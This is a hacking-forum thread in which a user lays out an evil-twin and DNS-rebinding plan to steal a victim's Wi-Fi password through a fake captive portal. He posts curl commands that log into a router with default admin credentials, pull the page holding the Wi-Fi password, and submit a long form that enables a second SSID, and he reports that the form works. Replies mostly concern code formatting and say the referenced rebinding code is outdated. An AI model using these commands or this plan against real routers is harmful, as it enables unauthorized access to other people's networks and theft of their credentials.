+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Network Hacking (https://sinister.ly/Forum-Network-Hacking)
+--- Thread: how can i perform dns rebinding using evil twin in local level ?! (/Thread-how-can-i-perform-dns-rebinding-using-evil-twin-in-local-level)
how can i perform dns rebinding using evil twin in local level ?! - mooooon - 04-12-2019
as the title says i want to perform this attack https://sinister.ly/Thread-DNS-Rebinding-Attack
using evil twin on local level
the curl command to login into the router
Code:
curl "http://192.168.1.1/" --data "frashnum=&action=login&Frm_Logintoken=25&Username=admin&Password=admin"the curl command to get the page that contains the wifi password
Code:
curl -v -X GET "http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_t.gch" -o 565.htmlthis how i was planing to perform the attack
evil twining a wifi using fluxion or whatever .... when the user opens the captive portal sign in network page (that has dns rebinding scripts in it )is detected we stop the ddos ... the user auto connects to his wifi then the page refreshes and execute the dns rebinding attack to get the wifi password from his router ....
but now i don't know how will get the html file back if want to use it in local level only so the other option was
to enable the second ssid that will launch with the default password so i can just login without getting any thing back
but i tried the curl command and it didn't work
Code:
curl "http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_wlan_essid_t.gch" -H "Origin: http://192.168.1.1" -H "Upgrade-Insecure-Requests: 1" -H "DNT: 1" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" -H "Referer: http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_wlan_essid_t.gch^&IF_VIEWID=IGD.LD1.WLAN2" --data "IF_ERRORSTR=SUCC^&IF_ERRORPARAM=SUCC^&IF_ERRORTYPE=-1^&IF_CONFIGTAG=Y^&IF_ACTION=apply^&WLAN_INSTNUM=4^&WLAN_SSID0=IGD.LD1.WLAN1^&WLAN_SSID1=IGD.LD1.WLAN2^&WLAN_SSID2=IGD.LD1.WLAN3^&WLAN_SSID3=IGD.LD1.WLAN4^&IF_SSIDATTR1=0^&IF_SSIDATTR2=0^&IF_SSIDATTR3=0^&IF_SSIDATTR4=0^&IF_VIEWID=IGD.LD1.WLAN2^&SettingStatus=CurruntSetting^&CardIsIn=1^&MaxInterface=4^&DeviceMode=InfrastructureAccessPoint^&CardMode=b^%^2Cg^%^2Cn^%^2Cbg^%^2Cgn^%^2Cbgn^&CardRev=0^&Class=255^&PID=33169^&VID=4332^&ValidIf=1^&Enable=1^&RadioStatus=NULL^&Standard=NULL^&BeaconInterval=NULL^&RtsCts=NULL^&Fragment=NULL^&DTIM=NULL^&TxPower=NULL^&CountryCode=NULL^&TxRate=NULL^&Channel=NULL^&ESSID=12345^&ESSIDPrefix=NULL^&ACLPolicy=NULL^&BeaconType=NULL^&WEPAuthMode=NULL^&WEPEncryptionLevel=NULL^&WEPKeyIndex=NULL^&WPAAuthMode=NULL^&WPAEncryptType=NULL^&WPAGroupRekey=NULL^&WPAEAPServerIp=NULL^&RadiusPort=NULL^&RadiusServerPort=NULL^&WPAEAPSecret=NULL^&PossibleChannels=NULL^&BasicDataRates=NULL^&OpDataRates=NULL^&PossibleTxRates=NULL^&OOBAccessEnabled=NULL^&BeaconEnabled=NULL^&ESSIDHideEnable=1^&RegulatoryDomain=NULL^&WlanMode=NULL^&DistanceFromRoot=NULL^&PeerBSSID=NULL^&AuthServiceMode=NULL^&QosType=NULL^&Priority=1^&UAPSDEnabled=NULL^&AutoChannelEnabled=NULL^&ChannelsInUse=NULL^&11iAuthMode=NULL^&11iEncryptType=NULL^&MaxUserNum=32^&SSIDIsolationEnable=NULL^&VapIsolationEnable=0^&Band=2.4G^&11nMode=1^&BandWidth=20Mhz^&SideBand=Lower^&11nRate=Auto^&SGIEnabled=0^&GreenField=0^&WdsMode=WDS_Disable^&Tx2Path=1^&IsPublicWiFiInterface=NULL^&MasterAuthServerIp=0.0.0.0^&MasterAuthServerPort=0^&MasterAuthServerSecret=^&Name=wlan0^&RealRF=1^&ChannelInUsed=8^&TxRateInUsed=Auto^&Bssid=54^%^3Abe^%^3A53^%^3A6a^%^3Af6^%^3Ac0^&IfStatus=Up^&UAPSDSupported=1^&WMMSupported=1^&TotalAssociations=4^&TotalBytesSent=2246220234^&TotalBytesReceived=3268409714^&TotalPacketsSent=22743088^&TotalPacketsReceived=14280169^&ErrorsSent=3057^&ErrorsReceived=0^&NonUnicastPacketsReceived=0^&UnicastPacketsSent=97163073747419137^&UnicastPacketsReceived=61100857587924993^&DiscardPacketsSent=8137^&DiscardPacketsReceived=68^&TotalPSKFailures=66^&TotalIntegrityFailures=6^&NumEasyPair=0^&ConnectStatus=Disconnected^&SingalQuality=0^&SingalStrength=0^&_SESSION_TOKEN=2714922195119803" --compressedcause it needs to check a checkbox as i think
more about this problem
https://www.sitepoint.com/community/t/how-can-i-check-a-checkbox-using-curl-in-a-router-page-ask-question/325785
edit i got the command working by removing every ^ from it
what do you think folks ?
RE: how can i perform dns rebinding using evil twin in local level ?! - darkninja1980 - 04-27-2019
please edit your code it hard to read it.
RE: how can i perform dns rebinding using evil twin in local level ?! - mooooon - 04-28-2019
(04-27-2019, 08:41 PM)darkninja1980 Wrote: please edit your code it hard to read it.
No need to edit it .... it works as it's .
I posted in these sites too
https://forum.antichat.ru/threads/470085/
http://www.kali-linux.fr/forum/index.php/topic,6237.0.html
RE: how can i perform dns rebinding using evil twin in local level ?! - Drako - 04-28-2019
That post is 5 years old... The code and the attack could be outdated.
RE: how can i perform dns rebinding using evil twin in local level ?! - darkninja1980 - 04-28-2019
(04-28-2019, 05:15 PM)mooooon Wrote:(04-27-2019, 08:41 PM)darkninja1980 Wrote: please edit your code it hard to read it.
No need to edit it .... it works as it's .
I posted in these sites too
https://forum.antichat.ru/threads/470085/
http://www.kali-linux.fr/forum/index.php/topic,6237.0.html
what I mean is like this for an example.
Code:
using System;
namespace SampleApp {
public delegate string MyDel(string str);
class EventProgram {
event MyDel MyEvent;
public EventProgram() {
this.MyEvent += new MyDel(this.WelcomeUser);
}
public string WelcomeUser(string username) {
return "Welcome " + username;
}
static void Main(string[] args) {
EventProgram obj1 = new EventProgram();
string result = obj1.MyEvent("Tutorials Point");
Console.WriteLine(result);
}
}
}RE: how can i perform dns rebinding using evil twin in local level ?! - mooooon - 05-23-2019
(04-28-2019, 06:31 PM)darkninja1980 Wrote:(04-28-2019, 05:15 PM)mooooon Wrote:(04-27-2019, 08:41 PM)darkninja1980 Wrote: please edit your code it hard to read it.
No need to edit it .... it works as it's .
I posted in these sites too
https://forum.antichat.ru/threads/470085/
http://www.kali-linux.fr/forum/index.php/topic,6237.0.html
what I mean is like this for an example.
Code:using System;
namespace SampleApp {
public delegate string MyDel(string str);
class EventProgram {
event MyDel MyEvent;
public EventProgram() {
this.MyEvent += new MyDel(this.WelcomeUser);
}
public string WelcomeUser(string username) {
return "Welcome " + username;
}
static void Main(string[] args) {
EventProgram obj1 = new EventProgram();
string result = obj1.MyEvent("Tutorials Point");
Console.WriteLine(result);
}
}
}
here is it
Code:
curl "http://192.168.1.1/getpage.gch?pid=1002&nextpage=net_wlan_essid_t.gch" -H "Origin: http://192.168.1.1" -H "Upgrade-Insecure-Requests: 1" -H "DNT: 1" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" -H "Referer: http://192.168.1.1/getpage.gch?pid=1002&nextpage=net_wlan_essid_t.gch&IF_VIEWID=IGD.LD1.WLAN2" --data "IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&IF_CONFIGTAG=Y&IF_ACTION=apply&WLAN_INSTNUM=4&WLAN_SSID0=IGD.LD1.WLAN1&WLAN_SSID1=IGD.LD1.WLAN2&WLAN_SSID2=IGD.LD1.WLAN3&WLAN_SSID3=IGD.LD1.WLAN4&IF_SSIDATTR1=0&IF_SSIDATTR2=0&IF_SSIDATTR3=0&IF_SSIDATTR4=0&IF_VIEWID=IGD.LD1.WLAN2&SettingStatus=CurruntSetting&CardIsIn=1&MaxInterface=4&DeviceMode=InfrastructureAccessPoint&CardMode=b%2Cg%2Cn%2Cbg%2Cgn%2Cbgn&CardRev=0&Class=255&PID=33169&VID=4332&ValidIf=1&Enable=1&RadioStatus=NULL&Standard=NULL&BeaconInterval=NULL&RtsCts=NULL&Fragment=NULL&DTIM=NULL&TxPower=NULL&CountryCode=NULL&TxRate=NULL&Channel=NULL&ESSID=12345&ESSIDPrefix=NULL&ACLPolicy=NULL&BeaconType=NULL&WEPAuthMode=NULL&WEPEncryptionLevel=NULL&WEPKeyIndex=NULL&WPAAuthMode=NULL&WPAEncryptType=NULL&WPAGroupRekey=NULL&WPAEAPServerIp=NULL&RadiusPort=NULL&RadiusServerPort=NULL&WPAEAPSecret=NULL&PossibleChannels=NULL&BasicDataRates=NULL&OpDataRates=NULL&PossibleTxRates=NULL&OOBAccessEnabled=NULL&BeaconEnabled=NULL&ESSIDHideEnable=1&RegulatoryDomain=NULL&WlanMode=NULL&DistanceFromRoot=NULL&PeerBSSID=NULL&AuthServiceMode=NULL&QosType=NULL&Priority=1&UAPSDEnabled=NULL&AutoChannelEnabled=NULL&ChannelsInUse=NULL&11iAuthMode=NULL&11iEncryptType=NULL&MaxUserNum=32&SSIDIsolationEnable=NULL&VapIsolationEnable=0&Band=2.4G&11nMode=1&BandWidth=20Mhz&SideBand=Lower&11nRate=Auto&SGIEnabled=0&GreenField=0&WdsMode=WDS_Disable&Tx2Path=1&IsPublicWiFiInterface=NULL&MasterAuthServerIp=0.0.0.0&MasterAuthServerPort=0&MasterAuthServerSecret=&Name=wlan0&RealRF=1&ChannelInUsed=8&TxRateInUsed=Auto&Bssid=54%3Abe%3A53%3A6a%3Af6%3Ac0&IfStatus=Up&UAPSDSupported=1&WMMSupported=1&TotalAssociations=4&TotalBytesSent=2246220234&TotalBytesReceived=3268409714&TotalPacketsSent=22743088&TotalPacketsReceived=14280169&ErrorsSent=3057&ErrorsReceived=0&NonUnicastPacketsReceived=0&UnicastPacketsSent=97163073747419137&UnicastPacketsReceived=61100857587924993&DiscardPacketsSent=8137&DiscardPacketsReceived=68&TotalPSKFailures=66&TotalIntegrityFailures=6&NumEasyPair=0&ConnectStatus=Disconnected&SingalQuality=0&SingalStrength=0&_SESSION_TOKEN=5598383297501123"and i can't edit it as it's a curl command !!
and if you mean the other code that looks like yours that @Ligeti wrote .... i don't understand it clearly so i can't edit it !
RE: how can i perform dns rebinding using evil twin in local level ?! - mooooon - 05-23-2019
(04-28-2019, 05:22 PM)Drako Wrote: That post is 5 years old... The code and the attack could be outdated.
so what do you suggest ?!
RE: how can i perform dns rebinding using evil twin in local level ?! - mooooon - 05-24-2019
(04-28-2019, 05:22 PM)Drako Wrote: That post is 5 years old... The code and the attack could be outdated.
i have tested it and all what i getting is this
![[Image: 60776781_1068062006716938_27346587245042...e=5D5CD42E]](https://scontent-hbe1-1.xx.fbcdn.net/v/t1.15752-9/60776781_1068062006716938_2734658724504272896_n.png?_nc_cat=111&_nc_ht=scontent-hbe1-1.xx&oh=3690cccd6dbbb2c127bc043551ffd569&oe=5D5CD42E)
![[Image: 61006550_446110716205177_189747256661272...e=5D6A81F8]](https://scontent-hbe1-1.xx.fbcdn.net/v/t1.15752-9/61006550_446110716205177_1897472566612721664_n.png?_nc_cat=101&_nc_ht=scontent-hbe1-1.xx&oh=3eac7b5273a5e9ff3663be4f02392ffe&oe=5D6A81F8)
and when i blocked my ip just like the article
i got this
![[Image: 61514836_293071584934378_828548238206933...e=5D5F429C]](https://scontent-hbe1-1.xx.fbcdn.net/v/t1.15752-9/61514836_293071584934378_8285482382069334016_n.png?_nc_cat=105&_nc_ht=scontent-hbe1-1.xx&oh=f2fe375b13b0a0f1effcd85964da823e&oe=5D5F429C)
any ideas ??
RE: how can i perform dns rebinding using evil twin in local level ?! - Drako - 05-24-2019
(05-24-2019, 03:58 AM)mooooon Wrote:(04-28-2019, 05:22 PM)Drako Wrote: That post is 5 years old... The code and the attack could be outdated.
i have tested it and all what i getting is this
and when i blocked my ip just like the article
i got this
any ideas ??
Well like I said, the code is probably way outdated. I can't really suggest anything there.
RE: how can i perform dns rebinding using evil twin in local level ?! - mooooon - 05-24-2019
(05-24-2019, 04:17 AM)Drako Wrote:(05-24-2019, 03:58 AM)mooooon Wrote:(04-28-2019, 05:22 PM)Drako Wrote: That post is 5 years old... The code and the attack could be outdated.
i have tested it and all what i getting is this
and when i blocked my ip just like the article
i got this
any ideas ??
Well like I said, the code is probably way outdated. I can't really suggest anything there.
what should i do now